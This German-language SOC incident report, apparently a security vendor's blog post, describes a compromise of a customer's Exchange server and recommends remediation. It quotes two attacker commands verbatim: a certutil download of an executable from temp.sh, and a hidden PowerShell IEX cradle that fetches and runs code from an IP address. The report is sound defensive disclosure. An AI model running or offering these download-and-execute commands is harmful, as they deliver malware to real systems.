Die SOC-Experten unserer Leitstelle haben kürzlich folgenden bedrohlichen Vorfall bei einem Kunden entdeckt. Über die Regel „Suspicious Certutil Command“ wurden sie auf den verdächtigen Befehl „C:\Windows\system32\cmd.exe /c certutil.exe -urlcache -f https://temp.sh/OkXnS/setup.exe C:\programdata\setup.exe >> C:\Windows\TEMP\tmpE338.tmp 2>&1” aufmerksam, der auf einem Exchange-Server ausgeführt wurde.
Der ausgeführte Befehl enthält den Parameter „-urlcache“, gefolgt von der URL des ausführbaren Programms Certutil.exe, eines Windows Dienstprogramms zur Verwaltung von Zertifikaten und Schlüsseln. Der außerdem verwendete Parameter „-f““ zeigt jedoch an, dass das Programm erzwungen heruntergeladen wurde, selbst wenn es bereits im Cache vorhanden war. Unter dem Namen „setup.exe“ wird das Programm dann in das Verzeichnis „C:\programdata“ extrahiert. Dieser ungewöhnliche Certutil-Befehl wird oft von Angreifern zur Decodierung bösartiger Codes verwendet.
Zudem beobachteten wir während der Untersuchung zusätzlich folgenden verdächtigen Befehl:
C:\Windows\system32\cmd.exe /c powershell.exe -nop -w hidden -c „IEX ((new-object net.webclient).downloadstring(‚http://176.113.115.44:80/a‘))\“ >> C:\Windows\TEMP\tmpAB1B.tmp 2>&1.
Dieser nutzt Powershell, um eine bösartige Datei von einer IP-Adresse herunterzuladen und führt den heruntergeladenen Code mithilfe der IEX-Funktion (Invoke-Expression) direkt aus.
Verdacht auf Malware? Neu-Installation des Servers schafft Abhilfe
Aufgrund dieser Befunde bestätigte sich unser Verdacht, dass der Angreifer aktiv über eine einfache Remote-Verbindung auf das System zugreift, um Malware zu verbreiten. Aus diesem Grund empfahlen wir unserem Kunden, den Exchange-Server schnellstmöglich neu zu installieren, um das Sicherheitsrisiko zu minimieren. Ergänzend dazu unterstützen unsere SOC-Experten unserem Kunden bei der Durchführung der erforderlichen Maßnahmen, um erneute Angriffe sowie Bedrohungen zu vermeiden. Wenn Sie sich weitere Informationen zu diesem Thema wünschen oder Hilfe bei der Verbesserung Ihrer IT-Sicherheitsmaßnahmen benötigen, kontaktieren Sie uns gerne.
Unsere Handlungsempfehlungen
- Neuinstallation des Exchange-Servers: Angesichts der potenziellen Auswirkungen auf die Sicherheit des Exchange-Servers empfehlen wir in solchen Fällen dringend, den Server neu zu installieren. Dadurch stellen Sie sicher, dass alle schädlichen Dateien und Konfigurationen entfernt werden und das System wieder sicher ist.
- Überprüfung weiterer Systeme: Überprüfen Sie auch andere Systeme im Netzwerk, um sicherzustellen, dass keine weiteren infizierten Geräte vorhanden sind. Prüfen Sie außerdem unbedingt, ob alle Systeme mit den neuesten Patches und Updates versehen sind, um das Risiko der Ausnutzung von Sicherheitslücken durch Angreifer zu minimieren.
- Netzwerküberwachung: Stellen Sie sicher, dass das Netzwerk überwacht wird, um verdächtige Aktivitäten oder Verbindungen zu erkennen. Eine kontinuierliche Überwachung kann dazu beitragen, Bedrohungen frühzeitig zu erkennen und zu verhindern.
- Schulung der Benutzer: Schulen Sie die Benutzer im Umgang mit Phishing- und Social-Engineering-Angriffen. Es ist wichtig, alle Benutzer darüber zu informieren, wie sie Phishing-E-Mails erkennen und melden können, um eine Infektion zu verhindern.
- Implementierung von Sicherheitsrichtlinien: Implementieren Sie strenge Sicherheitsrichtlinien, um das Risiko zukünftiger Angriffe zu minimieren. Zu diesen Richtlinien zählen das Aktualisieren von Software und Systemen, die Verwendung von Antivirus-Software sowie die Implementierung von Firewalls und anderen Sicherheitsmaßnahmen.